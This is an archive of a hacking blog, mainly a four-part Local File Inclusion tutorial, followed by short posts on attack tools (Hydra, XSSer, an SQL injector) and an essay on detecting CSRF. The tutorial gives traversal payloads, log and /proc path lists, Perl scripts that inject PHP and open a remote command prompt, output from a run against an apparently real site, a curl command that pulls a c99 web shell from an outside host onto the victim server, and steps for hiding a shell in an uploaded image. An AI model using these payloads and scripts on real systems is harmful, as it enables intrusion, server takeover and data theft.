Certified Ethical Hacker

Local File Inclusion Tutorial Part 4 of 4

2011-11-02T21:41:00.000+08:00

For the last part of our series, I have put together this list to go beyond /etc/passwd where we can find an LFI

/proc/
In the /proc/ can view information about the kernel, system, hardware etc..
Paths:
/proc/version
/proc/interrupts
/proc/meminfo
/proc/mounts
/proc/modules
/proc/partitions
/proc/filesystems
/proc/kallsyms
/proc/cpuinfo
/proc/cmdline

/proc/self/
The /proc/self is a link to the running process.
Paths:
/proc/self/environ

/proc/sys
The /proc/sys provides information but also (being an administrator) can enable or disable kernel features
Paths:
/proc/sys/fs
/proc/sys/dev/
/proc/sys/kernel/
/proc/sys/kernel/acct
/proc/sys/kernel/cap-bound
/proc/sys/kernel/domainname
/proc/sys/kernel/exec-shield
/proc/sys/kernel/exec-shield-randomize
/proc/sys/kernel/hostname
/proc/sys/kernel/hotplug
/proc/sys/kernel/modprobe
/proc/sys/kernel/version
/proc/sys/kernel/sysrq
/proc/sys/net/core/
/proc/sys/net/ipv4/
/proc/sys/vm/
/proc/sysvipc

/proc/net
The /proc/net displays information about the system's network configuration.
Paths:
/proc/net/arp
/proc/net/atm
/proc/net/dev
/proc/net/dev_mcast
/proc/net/igmp
/proc/net/ip_conntrack
/proc/net/ip_tables_names
/proc/net/ip_mr_cache
/proc/net/ip_mr_vif
/proc/net/netstat
/proc/net/psched
/proc/net/raw
/proc/net/route
/proc/net/rt_cache
/proc/net/snmp
/proc/net/sockstat
/proc/net/tcp
/proc/net/tr_rif
/proc/net/udp
/proc/net/unix
/proc/net/wireless

/proc/driver
The /proc/driver contains information about drivers that are being used in the system.

Other interesting paths
/proc/bus/
/proc/bus/usb/
/proc/bus/usb/devices
/proc/fs/nfsd/exports
/proc/tty/
/proc/tty/driver/serial
/proc/scsi/
/proc/ide/piix
/proc/ide/

Bonus :

You can also add to the list the following:

/etc/resolv.conf
/etc/hosts
/etc/postifx/main.cf ... (there are a few

Also, you can look for anti-rootkit and security stuff, for example:

/etc/rkhunter.conf
/etc/ossec-init.cnf
/etc/snort/rules/snort.conf
...

Startup scripts:

/etc/init.d/clamd
/etc/init.d/snortd
..

Good luck and happy pwning! :)

Local File Inclusion Tutorial Part 3 of 4

2011-09-29T12:38:00.000+08:00

LFI Technique

When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.

More specifically, the file /proc/self/environ of a php process running has something like this:

Code:

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/binï¿½
SERVER_ADMIN=webmaster@this.domainï¿½
(...)
(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentooï¿½HTTP_KEEP_ALIVE=300ï¿½
(...)

That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:

Code:

http://somesite.com/index.php?file=../../../../../proc/self/environ

you guessed right. it works Smile the php system is actually executed Smile

So, after coding this little perl script

Code:

#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while( $line = ) {
chop($line);
$browser->agent("jcfs /dev/stdout");?>jcfs");
$response = $browser->get( $url );
if ($response->content =~ /jcfs(.*)jcfs/s) {
print $1;
}
print "jcfsprompt: ";
}

I tried something like this...

Code:

jcfs@heaven ~/boxes $ perl lfi.pl http://www.fastfrags.co.uk/index.php?page=
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)

Local File Inclusion Tutorial Part 2 of 4

2011-09-08T22:34:00.000+08:00

Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================

So... first you find some site vuln to lfi... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D

Now,on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?

Open a new tab in Mozilla,and type "about:config" (without quotes)...

Now,in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Code:

Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7

Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:

If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...

Instead of typing

Code:

as useragent,type this:

Code:

Then load your vuln page like this:

Code:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php

So,lets review... basicaly,you are just adding &cmd= thing at the end of url...

Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:

Code:

http://yourvulnsite.com/c99.php

And that's all for now...cheers!

Local File Inclusion Tutorial Part 1 of 4

2011-08-30T11:25:00.000+08:00

Local File Inclusion Tutorial

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).

First lets take a look at a php code that is vulnerable to LFI:

PHP Code:

$page = $_GET[page];
include($page);
?>

Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.

Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.

Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):

Quote:
victim.com/index.php?page=../../../../../../../etc/passwd

If you don't know what to do with the content of etc/passwd then continue reading! :puah[1]: The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:

Quote:
username: passwd:UID:GID:full_name:directory:shell
For example:

Quote:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:

Quote:
username:x:503:100:FullName:/home/username:/bin/sh
As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many
processes, thats why you have access to it).

You can also sometimes see something like this:

Quote:
username:!:503:100:FullName:/home/username:/bin/sh
The ! indicates that the encoded password is stored in the etc/security/passwd file.

Heres a couple of places that may be interesting to "visit":

Quote:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.

Just one more quick thing, its also common to find a vulnerable code like:

PHP Code:

$page = $_GET["page"];
include("$page.php");
?>

In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
victim.com/index.php?file=../../../../../../../../etc/passwd

it will retrieve:
victim.com/index.php?file=../../../../../../../../etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte (%00):
victim.com/index.php?file=../../../../../../../../etc/passwd%00

With the null byte the server will ignore everything that comes after %00.

There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin! :jeerat.gif

We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:

Quote:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".

This possibly won't work because if you go look into the log you will probably see the php code like this:

Quote:
%3C?%20passthru(\$_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:

Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sucssefully injected in $log \n";

print "\nType command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}

Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now! :secret.gif

Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at http://www.milw0rm.com/video/watch.php?id=57

You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom download http://software.security-shell.com/i...e=edjpgcom.zipprogram (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!

Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!

After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:

Quote:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Quote:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!

Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.

In your browser type this (again, the nr of ../ may vary):

Quote:
victim.com/index.php=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In order "words" should look like this (using fictitious "names"):

Quote:
victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!

HexorBase v1.0 - Database Hacking Tool

2011-08-13T18:16:00.001+08:00

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

You can download it here : Hexorbase Database Ethical Hacking Tool

Detecting Cross-Site Request Forgery (CSRF)

2011-08-06T11:51:00.001+08:00

Cross-Site Request Forgery (CSRF) generates many questions from prospects, customers, partners, and Web application security professionals we work with. The questions tend to fall into similar categories, so we figured it would be helpful to summarize them and share our perspective on CSRF. We would definitely appreciate feedback and/or debate from the community to help battle-test our approach.

The 5 Most Often Asked Questions about CSRF

What is CSRF?
How do we decide which CSRF to report?
How do software security tools find CSRF today?
How do we test for CSRF?
Why do we consider CSRF unresolved if there are XSS or HTTP Response Splitting vulnerabilities present in the website?

First, what is CSRF?
At a high level, CSRF means an attacker can force a victim’s Web browser to make a request to a website of the attacker’s choosing, but the victim’s own Web browser makes the request. Of course, the ability of one’s own Web browser to make transparent requests to multiple websites is a fundamental design principle of the Web. For example, iFrames and Web 2.0 widgets perform legitimate actions like CSRF on websites all the time. The simplest form of CSRF is to embed content in one domain from another domain in a frame, which forces users’ browsers to make off-domain requests they may not realize they’re making. Another legitimate form of CSRF is to make a javascript-driven request to another website. In early Internet days many sites combined the use of frames and CSRF to share URL parameters between sites. I call this “The poor man’s Web service.”
Obviously there is potential for abuse when an attacker can make victims request a resource they want to avoid requesting, such as installing malware, changing a password to an attacker-controlled value, bidding on an unwanted item, etc. However, as noted above, there are legitimate uses for CSRF, including pulling in off-domain “Web 2.0″ JavaScript widgets, and sourcing in an image.
Basically, CSRF has a legitimate use-case to access almost every resource − from pages to forms − on most websites. Yet from a security perspective we are only interested in the abuse-cases.
So how do we distinguish between the legitimate use-cases and the abuse-cases for CSRF?

How does WhiteHat Security decide which CSRF to report?
At WhiteHat we define CSRF as a vulnerability when an attacker can execute CSRF against any of three types of resources:
1. Where security decisions are made.
2. Where an attacker can use CSRF to force arbitrary code injection that impacts one or more users.
3. Where a transaction occurs involving the transfer of money or goods.

Examples of decision-making processes that compromise security include:

Password Reset / User Account modification − authorization (Auth/Z) decision bypassed
Add contact or “friend” − confidentiality compromise based on assumption of user Auth/Z

Examples of CSRF forcing arbitrary code injection:

Send contact Web-based IM / message including an attack such as Cross-Site Scripting – compromise of authorization and confidentiality
Force user to malware/DbD (Drive-by Download) resource or revenue-cookie-stuffing resource – again compromise of confidentiality and Auth/Z

Examples of compromised transaction processes:

Bid on, or purchase of, unwanted/unexpected item
Change the “Ship To:” address field during legitimate user purchase
Submit stock trading requests, front-run user decisions, or manipulate the market

Compared to most design flaws, CSRF typically has a larger subjective “grey area” when defining which CSRF are vulnerabilities. We often find that a CSRF flaw requires more explanation in order for businesses to understand how CSRF puts their websites at risk compared to other design weaknesses. Consequently, the above definitions help us focus on – and give customers an understanding of – the CSRFs that can have negative impact on their security and their business.

How do software security tools find CSRF today?
CSRF is clearly a “Design Flaw / Business Logic” vulnerability or, from a software perspective, an error of omission at specification time. Specifications that address security abuse-cases are commonly omitted – in the password-reset CSRF example we provide below – the missing specification is “only authenticatedEntity actors should be able to reset their own passwords.” Given the context of omission – and given DAST’s strength at finding errors of omission – CSRF is most easily identified by Dynamic Analysis Software Testing (DAST). While it is possible to identify weak design-patterns in source code, such as the password-reset example, we find in practice that the majority of dangerous CSRFs are not identified by either Static Analysis Software Testing (SAST) or human source-code reviews.
It appears DAST Web application vulnerability scanners approach CSRF in one of three ways:
1. False-Negatives (FN): Do not test for CSRF.
2. False-Positives (FP): After scanning a website for vulnerabilities, attempt to replay every request reporting all successfully replayed requests – both idempotent and non-idempotent − as “Potential CSRF” regardless of security impact.
3. False-Negatives + False-Positives: Attempt to replay all non-idempotent POST requests/forms, and flag all successful replays as “CSRF Vulnerabilities.”
There are two big problems with approaching CSRF-testing automation in the three ways listed above. First, the problem of false negatives: Obviously, the scanners that ignore CSRF generate FNs. However, we have observed that most scanners tend to ignore both dynamically created forms and JSON requests (GET and POST) in their CSRF results. We are uncertain whether this oversight is an attempt to reduce false-positives (many JSON requests will have no CSRF security implications) or simply an artifact of current scanner limitations in executing javascript and/or testing DOM-based forms that require user interaction. Possibly, both factors result in the presence of false negatives.
The second important FN gap is that scanners fail to identify CSRFs that facilitate arbitrary code execution. This is particularly a problem in the case of persistent code injection, which can be used to make XSS/CSRF worms such as the Samy Worm on MySpace.
False positives: The two scanner approaches just mentioned generate a massive amount of false positives for scanner users to sort through as they look for the proverbial “vulnerable needle in the haystack.” We’ve learned that most users eventually turn off the CSRF testing features; otherwise, they find themselves overwhelmed with many more results than they can possibly sort. Recently, a few scanners have tried to “tune down” the number of false positives, using some form of keyword signature matching in order to filter the false positives and raise their potential priority. This is actually one of the approaches that Sentinel uses, and has shown some merit.

How does WhiteHat Security test for CSRF?
WhiteHat’s Sentinel Service uses a combination of automation and customized tests generated by engineers in our Threat Research Center (TRC) to test for CFSR. Because CSRF is a business logic issue it is handled under the testing domain of our Sentinel Premium Edition (PE) service. One of the unique features of Sentinel PE is that our TRC engineers map out the application and teach Sentinel how to navigate logic and workflows, as well as how to create user comparison tests that usually reach across multiple users and multiple roles.
During this initial testing process we flag key areas that meet our three “actionable” CSRF criteria defined above and test them for replay-ability. As part of the ongoing scanning process, Sentinel PE also identifies new code and opens tickets that TRC engineers use to custom configure Sentinel in order to test those functions. Because most CSRF occurs in forms / POST requests it is relatively easy to capture these new functions and new features as they are released in the Web application. Of course detecting vulnerabilities in new code as it is pushed requires scanning the application on an ongoing basis.
WhiteHat also reviews every application covered by Sentinel PE service on a yearly cycle to determine whether new design patterns or coding practices have been introduced that Sentinel might otherwise overlook. For example, a new type of Web-remoting library could expose an application to CSRF without Sentinel automatically detecting it. Therefore, our standard practice is to customize and configure Sentinel for all sites we assess whenever a new design pattern or programming practice is identified.
On to Sentinel automation – specifically: automating the detection of Weak Design Patterns. During the past four years we’ve learned a lot about CSRF while testing thousands of Web applications. One of the discoveries is that some CSRFs occur in common, weak design-patterns that can often be described with a high degree of accuracy. For these cases we’ve built an automated battery of “Known Bad CSRF conditions” that Sentinel searches for. As an example, let’s consider the obvious password-reset design:
If Sentinel discovers a password-reset function that has only two input fields that both accept the same input and can be replayed, there is an extremely high likelihood that the function is CSRFable with clear security implications. Likewise, this same pattern will flag the section in a new-user account registration workflow, which is private to the user-session and located where the user first creates a password. In some cases the initial password-creation function can be re-invoked via CSRF, and then used to reset the user’s existing password after the account is created.
There are several other examples, similar to the one just described above, where describing the replay criteria is fairly straightforward once you know the name of the form or function involved in the decision / transaction.

Why does WhiteHat Security consider CSRF unresolved if there are Cross-Site Scripting (XSS) or HTTP Response Splitting (HTTP/RS) vulnerabilities present in the website?
Most anti-CSRF controls involve embedding a Dynamic Authorization Token (DAT), a token that is a one-time-use, mathematically unique nounce, into each request. Presumably, users who have not legitimately requested a page would not have the DAT required to successfully submit a CSRFable form on that page. However, if any part of the Web application is vulnerable to XSS or HTTP/RS, then an attacker can bypass the CSRF protection. For the sake of specificity, let’s call an HTTP/RS vulnerability in a resource that facilitates XSS: “XSS++”.
Specifically, the attacker will first force the victim to make a CSRF request to the XSS/++ vulnerable website, injecting the attacker’s XSS/++ attack code into the application. That XSS/++ attack will then execute in the victim’s browser, making a CSRF request to the protected resource, and will then parse the DAT required to make the protected request from the response. Finally, the attack will resend the malicious CSRF request, including the DAT that is intended to protect it. In effect, XSS/++ neuters the effectiveness of token-based CSRF compensating controls.
Because the attacker can force a legitimate user to CSRF an XSS/++ attack anywhere in a Web application, it is essential to remember that all XSS/++ are equally vulnerable to the attacker in this scenario. If the victim is logged in, it does not matter if the XSS/++ vulnerability requires authentication. And it does not matter if the XSS/++ is persistent or reflected. What does matter is to know this: All XSS/++ can be attacked equally. While persistent XSS can certainly have a larger impact over time, in regards to this specific attack scenario, all XSS attack vectors are equal.

Conclusion
Let’s wrap up this section with a concrete, real-world example of how a seemingly “benign” CSRF can be combined with other vulnerabilities, including XSS, to completely compromise a system. Here are the parameters: A website has no obvious CSRF vulnerabilities, but it is vulnerable to XSS, and has a Local-File Include vulnerability that potentially could allow arbitrary server-side code execution. The vulnerable application also includes a “file-upload” feature, but because you cannot CSRF the file-upload cross-domain, most scanners will ignore this particular CSRF. However, the attacker can combine CSRF + XSS + the Local File Include vulnerabilities to completely compromise the website, the Web server, and the operating system − remotely − in this scenario.
Here’s how it’s done: A user of the vulnerable website visits another website that the attacker has already hacked. The hacked website forces the user’s browser to make a CSRF attack that injects an XSS attack payload into the vulnerable website. The XSS attack fetches the attacker’s malicious PHP file, uploads it, and then exploits the Local File Include design flaw to execute the malicious PHP file on the server, taking complete control of the system − a system that appeared free from CSRF attack. All of this malicious activity occurs without the attacker making a single click, and the victim is completely unaware that anything has happened. In this manner, a seemingly innocent CSRF can be combined with other potential and known vulnerabilities to produce disastrous results.
Given these facts, if you have CSRF vulnerabilities that present real risks, it is tactically imperative to fix all of your XSS and HTTP/RS vulnerabilities while simultaneously building your CSRF protections. It is equally important to have both an ongoing website risk measurement and testing program that can identify new XSS and HTTP/RS that appear in new code as it is released, as well as a process in place to remediate the new vulnerabilities quickly. Otherwise – your CSRF vulnerabilities will always be exploitable – and your Window of Exposure to CSRF in your Web applications will be open “All Year Long.”
There are other ways to improve both software designs and development processes in the SDLC in order to reduce XSS, XSS++, and in the CSRF in new code you write. However, that subject in itself is vast and requires a longer discussion.
In summary, for the purpose of measuring and managing risk to your organization from CSRF in applications that: (1) you own; (2) you control; (3) you don’t own; (4) and/or that you can’t control, you must have − at a minimum − an ongoing tactical Web security measurement and response program for CSRF, XSS, and XSS++.

Forensic Toolkit (FTK) Version 3

2010-08-23T19:31:00.000+08:00

THE INDUSTRY-STANDARD COMPUTER FORENSICS SOFTWARE USED BY GOVERNMENT AGENCIES AND LAW ENFORCEMENT AROUND THE WORLD

Forensic Toolkit® (FTK®) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface. FTK 3 is built for speed, analytics and enterprise-class scalability. Known for its intuitive interface, email analysis, customizable data views and stability, FTK lays the framework for seamless expansion, so your computer forensics solution can grow with your organization’s needs. Forensic Toolkit 3 is now the most advanced computer forensics software available, providing functionality that normally only organizations with tens of thousands of dollars could afford.

Download: http://www.accessdata.com

See also Review: Access Data Forensic Toolkit (FTK) Version 3 — Part 1

BackTrack 4 Release 1

2010-08-08T11:21:00.000+08:00

The BackTrack Team is proud to announce the public release of BackTrack 4 R1.At the risk of sounding like a broken record,we believe this version is by far the best version released to date.With a shiny new 2.6.34 kernel,there are many significant improvements,such as expanded hardware support,and improved desktop responsiveness

Tools have been updated systemwide, and a full Fluxbox desktop environment has been added.A walk-around for the rt28xx driver has been implemented (for all you AWUS050NH owners).
The VMWare version has complete integration with VMWare Tools,which provides a seamless interaction with BackTrack in a virtual environment.

More info and download: http://www.backtrack-linux.org

OWASP O2 Platform v1.1 Beta

2010-08-02T11:28:00.002+08:00

The OWASP O2 Platform is an OWASP Project which is a collection of Open Source modules that help Web Application Security Professionals to maximize their efforts and quickly obtain high visibility into an application's security profile.The objective is to 'Automate Application Security Knowledge and Workflows"

Download: Here

Documentation: http://www.o2platform.com

XSSer v0.6 - "XSSer Storm"

2010-07-29T23:16:00.000+08:00

SSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports this new features:
-g DORK Process search engine dork results as target urls
(ex:inurl:vulnerable.asp?id=)
--Ge=DORK_ENGINE Search engine to use for dorking (scroogle,
duck, altavista, bing)
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling
--Dfo Encodes fuzzing IP addresses in DWORD format

Download: http://xsser.sourceforge.net

"Backup" Tools For Mysql Administration

2010-07-22T21:46:00.000+08:00

mysqldumper

MySQLDumper is a script for backing up MySQL databases written in PHP and Perl. It uses a proprietary technique to avoid execution interruption by reading and saving a certain amount of commands, then calling itself via JavaScript to memorize how far in the process it was. Finally, the script resumes its action from last standby.

Download:
Code:http://forum.mysqldumper.de/downloads.php?cat=2[Image]

phpMyBackupPro

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup script, licensed under the GNU GPL. Script allows a lot of operations such: backup of one or several databases with or without data, table structure; backup directly onto FTP server and sending of backups by email; manage, restore and schedule backups and others. phpMyBackup Pro is platform independent: it requires only a web-server and PHP.

Download:
Code:http://www.phpmybackuppro.net/download.php[Image]

AutoMySQLBackup
A shell script to take daily, weekly and monthly backups of MySQL databases using mysqldump. It's features includes: backing up mutiple databases, create a backup into a single backup file or to a separate file for each DB, backup files compression, backup to remote server, e-mail user when backup is completed and others.

Download
Code:http://sourceforge.net/projects/automysqlbackup/files/

Backup2Mail
Backup2Mail is a PHP script that creates regular backups of MySQL databases and sends them to configurable e-mail address. The whole process can be scheduled with a help of Cron (for Unix/Linux) or with Task Scheduler (for Windows).

Download
Code:http://www.backup2mail.com/download/backup2mail.zip

mylvmbackup
mylvmbackup is utility for creating MySQL backups via LVM snapshots. To perform this, mylvmbackup obtains a read lock on all tables, flushes all server caches to disk, creates a snapshot of the volume containing the MySQL data directory and unlocks the tables again. The LVM snapshot is mounted to a temporary directory and all data is backed up using the tar or rsync program. Script requires Perl5 and LVM utilities.

Download
Code:http://www.lenzg.net/mylvmbackup/#Downloads

MyPHPdumpTool (mpdt)
MyPHPdumpTool is a PHP (CLI) based MySQL backup tool that can be configured to automatically archive and upload any database-dump file to any FTP server. The backup process can be scheduled with a help of Cron (for Unix/Linux) or with Task Scheduler (for Windows).

Download:
Code:http://sourceforge.net/projects/myphpdumptool/files/

mysqlblasy (MySQL backup for lazy sysadmins)
mysqlblasy is a Perl script for automating MySQL database backups. The main feature of this script is automatic backups rotation to avoid that the backup disk gets full when the administrator is on vacation (or is lazy). Each database gets dumped into a separate file, after which all the dumps get tarred/compressed and placed into the specified backup directory. Old files in the backup directory get deleted, and the number of newest files that is specified in configuration file is kept.

Download:
Code:http://pol.spurious.biz/projects/scripting/mysqlblasy.php#downloadSypex Dumper Lite

Sypex Dumper Lite is developed by specialists of Ukrainian company and it is a PHP script for quick and easy MySQL database backup. The script is very fast with all types of databases (small or large), because it uses special technique for dumping: the backup file is not stored entirely in memory.

Download:
Code:http://sypex.net/products/dumper/downloads/

Safe3 SQL Injector

2010-07-12T22:52:00.000+08:00

Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.

Features:
Full support for GET/Post/Cookie Injection;
Full support for HTTP Basic, Digest, NTLM and Certificate authentications
Full support for MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite
Full support for Error/Union/Blind/Force SQL injection
Support for file acess,command execute,ip domain reverse,web path guess,md5 crack,etc.
Super bypass WAF

Download: http://sourceforge.net

THC-Hydra

2010-07-08T22:53:00.001+08:00

A very fast network logon cracker which support many different services
Currently this tool supports:

TELNET, FTP, Firebird, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY,HTTP-PROXY-NTLM,HTTP-FORM-GET HTTP-FORM-POST, HTTPS-FORM-GET,HTTPS-FORM-POSTLDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL,POSTGRES,POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth,Cisco enable, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, Cisco AAA,REXEC, SOCKS5, VNC, POP3 and VMware Auth.

Changelog for 5.7:

* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz
* Removed unnecessary compiler warnings
* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be
* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??

Download: http://freeworld.thc.org

Maltego version 3

2010-07-07T12:01:00.000+08:00

Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.

Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
Maltego provide you with a much more powerful search, giving you smarter results.
If access to "hidden" information determines your success, Maltego can help you discover it.

Download and more info: http://www.paterva.com

NetworkMiner

2010-07-05T15:01:00.000+08:00

